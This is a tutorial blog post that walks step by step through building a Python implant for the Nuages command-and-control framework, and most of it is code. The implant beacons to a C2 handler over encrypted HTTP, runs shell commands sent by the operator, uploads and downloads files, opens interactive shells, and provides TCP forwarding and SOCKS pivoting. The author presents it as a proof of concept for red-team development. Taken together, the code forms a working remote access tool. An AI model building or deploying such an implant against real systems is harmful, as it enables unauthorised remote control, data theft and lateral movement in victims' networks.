Tutorial: Creating a custom implant
- Introduction
- Communicating with the Nuages API
- Implementing the Nuages API
- Implementing Simple Jobs
- Implementing Intermediate Jobs
- Implementing Complex Jobs
- Conclusion
It's been a year since I created Nuages and the project has come a really long way. I have been wanting to create a Python implant for Linux/macOS hosts for a while, and I figured it would be a good way to demonstrate how easy it is to create a full-featured implant using the Nuages API.
The following tutorial goes through the process of building the implant in Python using the Nuages API, and should serve as a guideline for anyone wanting to write their own implant in any language.
The features we will implement are:
- Command execution
- File Upload
- File Download
- Interactive Channels
- Socks Proxying
- TCP forwarding
It takes five minutes to get a Nuages server running on a Debian host with MongoDB and Node installed:
Our implant needs to go through a handler. We are going to start with the simple HTTPAES256 Python handler. Nuages abstracts the handler away, so we can add support for more handlers in the future and all the features will still work!
Let's start by running the handler:
The handler's protocol is fairly simple and it should be possible to reuse a lot of its code given that it is written in Python. The rough details of the communication protocol can be found here.
This handler is reached over HTTP POST requests. We can start by writing a simple POST request using the Python requests module, and then add encryption using the AESCipher class from the handler code.
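In practice, the AESCipher class should simply be copied from the handler's Python code so that the encryption scheme matches the server exactly. For reference, here is a minimal sketch of what such a class can look like, assuming AES-256-CBC with a SHA-256-derived key and a random IV prepended to the ciphertext; treat it as an illustration rather than the handler's actual implementation.
from hashlib import sha256
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
class AESCipher:
    # Illustrative sketch only: copy the real class from the HTTPAES256 handler
    # so that key derivation, padding and IV handling match the server exactly
    def __init__(self, key):
        # Derive a 256-bit key from the shared password
        self.key = sha256(key.encode()).digest()
    def _pad(self, data):
        # PKCS7-style padding up to the AES block size
        pad = AES.block_size - len(data) % AES.block_size
        return data + bytes([pad]) * pad
    def encrypt(self, data):
        # Prepend a random IV to the CBC ciphertext
        iv = get_random_bytes(AES.block_size)
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return iv + cipher.encrypt(self._pad(data))
    def decrypt(self, data):
        # Split off the IV, decrypt and strip the padding
        iv, body = data[:AES.block_size], data[AES.block_size:]
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        plain = cipher.decrypt(body)
        return plain[:-plain[-1]]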
# Imports the implant will need throughout this tutorial
import base64
import json
import os
import platform
import socket
import subprocess
import time
import requests
from threading import Thread
from queue import Queue, Empty
# The AESCipher class comes from the handler's Python code (see the sketch above)
class NuagesConnector:
def __init__(self, connectionString, key):
# The URL of our handler
self.connectionString = connectionString
# The seed to generate our encryption key
self.aes = AESCipher(key)
def POST(self, url, data):
# The Json data is sent encrypted in the request body
encrypted_data = self.aes.encrypt(bytes(data, 'utf-8'))
# The target URL is sent as Base64 in the Authorization header
encrypted_url = base64.b64encode(self.aes.encrypt(bytes(url, 'utf-8')))
headers = {'Authorization': encrypted_url}
r = requests.post(self.connectionString, encrypted_data, headers=headers)
if(r.status_code != 200):
raise Exception(r.status_code)
# The result must be decrypted
return self.aes.decrypt(r.content)
nuages = NuagesConnector("http://127.0.0.1:8080","password")
response = nuages.POST("register","")
print(response)
Perfect! We are talking to Nuages through the Handler:
Now that our implant can talk to Nuages, we can continue by implementing the different API calls that the implant must use. There are only four API calls needed to support all the different features: register, heartbeat, jobresult, and io. We will only need the first three to get started. A brief description of the implant logic can be found here, and the API documentation can be found here.
The first thing the implant must do is register. Using the register API call, the implant provides some information about itself to the server and receives an ID in exchange. We can create a NuagesImplant class with a register method to obtain the ID:
def __init__(self, nuages, config):
# This is the connector object the implant will use to communicate with the API
self.nuages = nuages
# A configuration dictionary
self.config = config
# The implant gathers all the information about itself when it is created
self.os = platform.system()
if self.os == "Windows":
self.username = os.getenv("username")
else:
self.username = os.getenv("LOGNAME")
self.hostname = socket.gethostname()
self.ip = socket.gethostbyname(self.hostname)
self.handler = "HTTPAES256"
self.implantType = "Python"
self.connectionString = self.nuages.connectionString
self.supportedPayloads = ["cd", "command", "configure", "upload", "download", "interactive", "tcp_fwd", "socks"]
def register(self):
# The implant information is put into Json
data = json.dumps({'os': self.os,\
'hostname': self.hostname,\
'localIp': self.ip,\
'username': self.username,\
'handler': self.handler,\
'implantType': self.implantType,\
'connectionString': self.connectionString,\
'supportedPayloads': self.supportedPayloads
})
self.id = ""
# We use the connector to obtain an id from the server
while self.id == "":
response = self.nuages.POST("register", data)
self.id = json.loads(response)["_id"]
time.sleep(5)
# Creating a connector
nuages = NuagesConnector("http://127.0.0.1:8080","password")
config = {}
# Creating the implant
implant = NuagesImplant(nuages, config)
# Registering the implant
implant.register()
When we run the code, we can see in the client that the implant is successfully registered:
Now that our implant is registered, we can implement the main method of our implant. The start method will get it started and the heartbeat method will be called periodically. The heartbeat API call is used to send jobs to the Implant: the Implant sends its ID and receives a list of jobs from the server.
def heartbeat(self):
# The implant sends its ID and receives a list of jobs as a response
data = json.dumps({'id': self.id})
response = self.nuages.POST("heartbeat", data)
return json.loads(response)["data"]
def start(self):
self.register()
while True:
jobs = self.heartbeat()
time.sleep(int(self.config["sleep"]))
nuages = NuagesConnector("http://127.0.0.1:8080","password")
config = {}
config["sleep"] = "1"
implant = NuagesImplant(nuages, config)
implant.start()
The last API call we need to implement before being able to execute jobs is jobresult. This API call is used by the Implant to return the result of a job to the Server. If the result is too large, it can be chunked into pieces.
def jobResult(self, job_id, result, error):
# The implant won't send more than this amount of data per request
buffersize = int(self.config["buffersize"])
i = 0
l = len(result)
# If the result is empty a single request is needed
if(l == 0):
data = json.dumps({'moreData': False,\
'jobId': job_id,\
'result': "",\
'error': error})
self.nuages.POST("jobResult", data)
return
# Let's chunk the result into pieces and submit them to the server
while(i < l):
if(i + buffersize >= l):
data = json.dumps({
'moreData': False,\
'jobId': job_id,\
'result': result[i:],\
'error': error})
else:
data = json.dumps({
'moreData': True,\
'jobId': job_id,\
'result': result[i:i+buffersize],\
'error': error})
i += buffersize
self.nuages.POST("jobResult", data)
Now that we have our basic API calls implemented we can start implementing our first jobs!
Job payloads are in the format {Type: "", Options: {}} and can be implemented in any way desired, although using standardized payloads enables more compatibility with modules and clients down the road. A list of standard payloads can be found here.
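As an illustration, here is roughly what a job carrying a standard command payload could look like once parsed from JSON by the implant; the field names match what the code below reads, and the values are made up:
example_job = {
    "_id": "<job id assigned by the server>",
    "payload": {
        "type": "command",
        "options": {
            "cmd": "whoami",  # the command to execute
            "path": "/tmp"    # optional working directory
        }
    }
}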
We can add logic to the start function to execute the payloads based on their types. Additionally, we add a generic exception handler to return errors to the server in case of failure. The jobs are executed in separate threads to enable multitasking.
def executeJob(self, job):
try:
if (job["payload"]["type"] == "command"):
self.do_command(job)
elif (job["payload"]["type"] == "cd"):
self.do_cd(job)
elif (job["payload"]["type"] == "exit"):
self.do_exit(job)
elif (job["payload"]["type"] == "configure"):
self.do_configure(job)
elif (job["payload"]["type"] == "download"):
self.do_download(job)
elif (job["payload"]["type"] == "upload"):
self.do_upload(job)
elif (job["payload"]["type"] == "interactive"):
self.do_interactive(job)
elif (job["payload"]["type"] == "tcp_fwd"):
self.do_tcp_fwd(job)
elif (job["payload"]["type"] == "socks"):
self.do_socks(job)
except Exception as e:
# If the job fails, we inform the server
self.jobResult(job["_id"], str(e), True)
raise e
def start(self):
# Registering the implant
self.register()
while True:
try:
# Obtaining jobs
jobs = self.heartbeat()
for job in jobs:
# Executing each job in a new thread
t = Thread(target=self.executeJob, args=([job]))
t.daemon = True
t.start()
time.sleep(int(self.config["sleep"]))
except Exception as e:
pass
The command payload is the most important as it enables code execution on the implant. It is very simple to implement in Python:
def do_command(self, job):
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
# The command is executed
child = subprocess.Popen(job["payload"]["options"]["cmd"], shell = True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
result = child.communicate()[0]
error = (child.returncode != 0)
# The result is returned to the server
self.jobResult(job["_id"], result.decode("utf-8"), error)
We can now execute commands on the implant:
The cd payload is mostly used for convenience.
def do_cd(self, job):
# The path to execute the CD command from (dir may be a relative path)
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
# The path to CD into
if ("dir" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["dir"])
# The new directory is returned to the server
self.jobResult(job["_id"], os.getcwd(), False)
As simple as it is, I think having this payload implemented makes our lives a lot easier:
The exit payload is another simple job, used to kill the implant.
def do_exit(self, job):
# The implant exits with a message
self.jobResult(job["_id"], "Bye!", False)
os._exit(0)
The configure payload enables the implant to be reconfigured at runtime.
def do_configure(self, job):
# If the config must be changed
if ("config" in job["payload"]["options"]):
config = job["payload"]["options"]["config"]
# We change all the keys that are defined in the job
for key in config:
self.config[key] = config[key]
# We return the configuration to the client as text
self.jobResult(job["_id"], json.dumps(self.config), False)
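For reference, the configuration keys read by the methods in this implant are sleep, buffersize and refreshrate, so the initial config (or a configure payload) should provide all three. The values below are only an illustration:
config = {
    "sleep": "1",           # seconds between heartbeats
    "buffersize": "65536",  # maximum bytes sent per request (jobResult and pipe methods)
    "refreshrate": "100"    # pipe polling delay, in milliseconds
}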
Now that we have the basics covered, we can continue with more complicated payloads that use unidirectional Nuages pipes.
Nuages Pipes are virtual streams that implants and clients can communicate with through the io endpoint of the Nuages API.
Nuages Pipes can be read from and/or written to, and can be connected to any NodeJs Stream objects such as files, process input/output, TCP Sockets etc.
Nuages Pipes can create virtual streams between Implant and Server, or between Client and Implant.
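Concretely, every io request made by this implant carries a small JSON body: a read sets maxSize to the number of bytes we are willing to receive, a write places base64-encoded bytes in the in field, and the response may contain an out field with base64-encoded bytes read from the pipe. Here is a rough sketch of the two shapes, where the pipe_id comes from the job options:
# Reading up to 65536 bytes from a pipe:
read_body = {"pipe_id": "<pipe id from the job options>", "maxSize": 65536}
# Writing bytes to a pipe without reading anything back:
write_body = {"pipe_id": "<pipe id from the job options>", "maxSize": 0,
              "in": "<base64-encoded bytes>"}
# The JSON response may contain {"out": "<base64-encoded bytes>"}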
To implement a download job, we will read from a Nuages pipe and write its output to a Python file stream. Let's implement a pipe2stream method first:
def pipe2stream(self, pipe_id, stream, bytesWanted):
bytesRead = 0
# The implant configuration is used
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# Until the whole file has been loaded from the pipe
while (bytesRead < bytesWanted):
# We don't want to read more from the pipe than the size of our buffer
body["maxSize"] = min(buffersize, bytesWanted - bytesRead)
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# The output is encoded in Base64
buffer = base64.b64decode(response["out"])
bytesRead += len(buffer)
# We can write the bytes to the stream
stream.write(buffer)
time.sleep(refreshrate)
Now that we have the pipe2stream method, the download job is very easy to implement:
def do_download(self, job):
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
# The file argument could be a directory, in which case we will
# use the default file name and write the file to that directory
if os.path.isdir(job["payload"]["options"]["file"]):
os.chdir(job["payload"]["options"]["file"])
target = job["payload"]["options"]["filename"]
else:
target = job["payload"]["options"]["file"]
# We open the file stream
with open(target, "wb") as fs:
# We use pipe2stream to pipe the Nuages pipe into the filestream
self.pipe2stream(job["payload"]["options"]["pipe_id"], fs, job["payload"]["options"]["length"])
self.jobResult(job["_id"], fs.name, False)
Files can now be downloaded to the implant:
Uploads use similar logic to downloads, except this time we will pipe the file stream into the Nuages pipe. We can start by implementing the stream2pipe method:
def stream2pipe(self, pipe_id, stream):
# The implant configuration is used
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# We don't want to read anything from the pipe
body["maxSize"] = 0
buffer = [1]
# While we can still read bytes from the file stream
while (len(buffer) > 0):
buffer = stream.read(buffersize)
# The bytes are base64 encoded and sent to the stream
body["in"] = base64.b64encode(buffer).decode("ascii")
self.nuages.POST("io", json.dumps(body))
time.sleep(refreshrate)
Similarly, now that we have the stream2pipe method, it is very simple to write the do_upload method:
def do_upload(self, job):
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
if os.path.isdir(job["payload"]["options"]["file"]):
raise "This is a directory"
# We open the file stream
with open(job["payload"]["options"]["file"], "rb") as fs:
# We use stream2pipe to pipe the filestream into the Nuages pipe
self.stream2pipe(job["payload"]["options"]["pipe_id"], fs)
self.jobResult(job["_id"], fs.name, False)
Our Implant can now upload files:
We have a basic implant, with code execution, upload and download. Let's move on to more interesting features!
These final three payloads use bidirectional Nuages pipes.
I personally love this payload even though I rarely use it. I think it's really cool to get an interactive shell on an implant, especially when the traffic is tunneled through a more advanced handler such as Slack or DNS. We will need to create a process and sync its input/output/error streams with a Nuages pipe.
We will need two new pipe methods:
- pipe_read: Reads any data available in a pipe
- pipe_readwrite: Writes data to the pipe and returns available data
def pipe_read(self, pipe_id):
buffersize = int(self.config["buffersize"])
body = {}
body["pipe_id"] = pipe_id
# We inform the server that we have a maximum buffer size
body["maxSize"] = buffersize
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# We decode the output and return it as bytes
return base64.b64decode(response["out"])
else:
return b''
def pipe_readwrite(self, pipe_id, data):
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# We inform the server that we have a maximum buffer size
body["maxSize"] = buffersize
buffer = b''
sentBytes = 0
l = len(data)
# Until we have sent all the data we need to send
while (sentBytes < l):
# We can't send more than our buffer
bytesToSend = min(buffersize, l - sentBytes)
# The data is sent as base64
body["in"] = base64.b64encode(data[sentBytes:sentBytes + bytesToSend]).decode("ascii")
sentBytes += bytesToSend
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# If there is data in the stream it is appended to our buffer
buffer += base64.b64decode(response["out"])
time.sleep(refreshrate)
# We return any data that we read
return buffer
These two methods will make writing do_interactive easier. This method ended up being pretty tricky to write, as Python blocks on read attempts to a process's stdout. The solution was to create a separate thread that reads from stdout and places the output in a queue.
def enqueue_output(proc, queue):
while(proc.poll() == None):
queue.put(proc.stdout.read(1))
def do_interactive(self, job):
refreshrate = float(self.config["refreshrate"]) / 1000
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
command = [job["payload"]["options"]["filename"]]
if ("args" in job["payload"]["options"]):
args = job["payload"]["options"]["args"]
if(args!=""):
command.extend(args.split(" "))
# We create a process object and pipe its output
proc = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
pipe_id = job["payload"]["options"]["pipe_id"]
# We create a queue to communicate with the enqueuing thread
queue = Queue()
# We create a thread that reads from the process and puts the bytes in the queue
# This is necessary as python blocks on process.stdout.read() operations
t = Thread(target=enqueue_output, args=(proc, queue))
t.daemon = True
t.start()
line = b""
try:
# While the process is still running
while(proc.poll() == None):
# If there are bytes in the queue, they come from stdout/stderr
try: line += queue.get_nowait()
except Empty:
if(len(line) == 0):
# If stdout was empty, we just need to read from the pipe
inbuffer = self.pipe_read(pipe_id)
else:
# If not, we write the bytes to the pipe
inbuffer = self.pipe_readwrite(pipe_id,line)
# If we received data from the pipe, we feed it into stdin
if(len(inbuffer) > 0):
proc.stdin.write(inbuffer)
proc.stdin.flush()
time.sleep(refreshrate)
line = b""
except Exception as e:
del queue
raise e
del queue
self.jobResult(job["_id"], "Process Exited!", False)
I think the result is pretty cool:
The logic behind TCP forwarding is similar to the interactive payload. We will open a client TCP stream and sync it with a Nuages pipe bidirectionally. We can reuse the pipe_read and pipe_readwrite methods.
def do_tcp_fwd(self, job):
host = job["payload"]["options"]["host"]
port = int(job["payload"]["options"]["port"])
pipe_id = job["payload"]["options"]["pipe_id"]
refreshrate = float(self.config["refreshrate"]) / 1000
buffersize = int(self.config["buffersize"])
# We open a client TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# We set a very short timeout on the socket to prevent hanging as
# we don't know the amount of data we are reading from the socket
s.settimeout(refreshrate)
try:
while True:
outbuff = ""
try:
# We try to read from the socket
outbuff = s.recv(buffersize)
# This timeout is normal
except socket.timeout:
if(len(outbuff) == 0):
# If the buffer is empty, we just need to read from the pipe
inbuff = self.pipe_read(pipe_id)
else:
# If not, we send it to the pipe and receive data from the client
inbuff = self.pipe_readwrite(pipe_id, outbuff)
time.sleep(refreshrate)
# We write what we received from the pipe to the socket
s.sendall(inbuff)
pass
else:
# If the socket did not timeout but returned "", it has been closed
if(len(outbuff) == 0):
self.jobResult(job["_id"], "Server closed connection", False)
return
# If we read an entire buffer before timeout (seems very unlikely)
else:
inbuff = self.pipe_readwrite(pipe_id, outbuff)
time.sleep(refreshrate)
s.sendall(inbuff)
except Exception as e:
# If the pipe has been deleted
if(str(e) == "404"):
self.jobResult(job["_id"], "Client closed connection", False)
return
else:
raise(e)
That was a lot simpler than expected! We can now use our implant to pivot over tcp:
Last but not least, the socks proxy. It is the most useful payload in my opinion, as it makes pivoting a breeze. It should not be too hard to write now that we have the TCP forwarding payload working. We will be using the SOCKS4 and SOCKS5 RFCs as a reference. We need two final pipe methods:
- pipe_readbytes: Reads an exact number of bytes from the Nuages pipe
- pipe_write: Writes data to the pipe without reading anything back
These methods will help when implementing the socks handshakes, as we need to control the amount of data sent and received.
def pipe_readbytes(self, pipe_id, bytesWanted):
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
buffer = b''
# We read from the pipe until we have read the amount we want
while (len(buffer) < bytesWanted):
# We don't want to read more than needed
body["maxSize"] = min(buffersize, bytesWanted - len(buffer))
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# We append the read data to our buffer
buffer += base64.b64decode(response["out"])
time.sleep(refreshrate)
# We return the buffer
return buffer
def pipe_write(self, pipe_id, data):
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# We don't want to read from the pipe
body["maxSize"] = 0
sentBytes = 0
l = len(data)
# Until we have sent all the data we need to send
while (sentBytes < l):
# We can't send more than our buffer
bytesToSend = min(buffersize, l - sentBytes)
# The data is sent as base64
body["in"] = base64.b64encode(data[sentBytes:sentBytes + bytesToSend]).decode("ascii")
sentBytes += bytesToSend
self.nuages.POST("io", json.dumps(body))
time.sleep(refreshrate)
Now we can implement the socks 4/5 protocols and apply the same logic as the TCP forwarding payload once the connection is established.
The function is truncated to show only the SOCKS4 implementation on this page, but the full function is available in the Implants directory of Nuages.
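As a quick reference for the parsing below, a SOCKS4 CONNECT request sent by the client has the following layout; the reply codes 90 and 91 used in the code mean request granted and request rejected respectively:
# SOCKS4 CONNECT request, read field by field from the pipe below:
#   VN (1 byte, always 4) | CD (1 byte, 1 = CONNECT) | DSTPORT (2 bytes) |
#   DSTIP (4 bytes)       | USERID (variable)        | NULL terminator (1 byte)
# The implant answers with a version byte of 0 followed by a status byte:
#   90 = request granted, 91 = request rejected or failed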
def do_socks(self, job):
refreshrate = float(self.config["refreshrate"]) / 1000
buffersize = int(self.config["buffersize"])
pipe_id = job["payload"]["options"]["pipe_id"]
# We read two bytes from the client
rBuffer = self.pipe_readbytes(pipe_id, 2)
# If it is a socks 5 connection
if(rBuffer[0] == 5):
# Truncated
# If it is a socks 4 connection
elif(rBuffer[0] == 4):
# We ensure that we can understand the command type
if(rBuffer[1] != 1):
# If not we respond to the client
self.pipe_write(pipe_id, bytes([0, 91]))
raise Exception("Invalid socks 4 command")
# We read the port number from the client
buffPort = self.pipe_readbytes(pipe_id, 2)
port = buffPort[0] * 256 + buffPort[1]
# We read the IP address from the client
ipv4 = self.pipe_readbytes(pipe_id, 4)
host = str(ipv4[0]) + "." + str(ipv4[1]) + "." + str(ipv4[2]) + "." + str(ipv4[3])
# We read and discard the null-terminated USERID field from the client
while(rBuffer[0] != 0):
rBuffer = self.pipe_readbytes(pipe_id, 1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# We establish the connection
s.connect((host, port))
except Exception as e:
# We complete the handshake with failure
wBuffer = bytes([0, 91]) + ipv4 + buffPort
self.pipe_write(pipe_id, wBuffer)
raise(e)
# We complete the handshake with success
wBuffer = bytes([0, 90]) + ipv4 + buffPort
self.pipe_write(pipe_id, wBuffer)
s.settimeout(refreshrate)
## Truncated, the code is the same as for the TCP forwarding payload from this point on
And our last payload is complete!
We have completed the Implant with all the features we wanted. It took about 5 hours to write, which I think is pretty fast given the features implemented.
Of course this is not a weaponized implant but I think it's a decent POC and a good introduction to Nuages development.
The full implant can be found here: https://github.com/p3nt4/Nuages/blob/master/Implants/NuagesPythonImplant/NuagesPythonImplant.py